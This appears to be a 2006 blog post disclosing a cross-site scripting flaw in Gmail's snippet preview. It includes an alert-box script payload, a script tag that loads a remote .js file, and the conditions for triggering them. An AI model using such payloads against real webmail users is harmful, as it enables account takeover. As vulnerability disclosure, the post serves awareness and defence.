March 1st, 2006

Error

From indigoskynet!

Gmail has a major security bug.

You know how it shows 'snippets' of the email near the subject line? If the snippet is javascript, gmail will execute it.

Yea.

It only works if you send it from an address thats *not* gmail, and apparently it has to have a subject, and it has to be a new page load, not a automatic refresh.

Very odd, but yea. It works.

1<SCRIPT>alert("haha")</SCRIPT>

So, if I can get this to load a remotely hosted .js file I could easily takeover your gmail account.
Right now, as for me, I'm turning off the snippet option.

UPDATE:
1<SCRIPT SRC="URL"> will indeed execute. This means that a javascript file any size can be executed, not just a tiny bit that fits in the snippet. We're talking major security flaw now. At best you can hope your firewall will catch it if its trying to damage your computer.


Yeeks! *turns of snippets until further notice*

-TG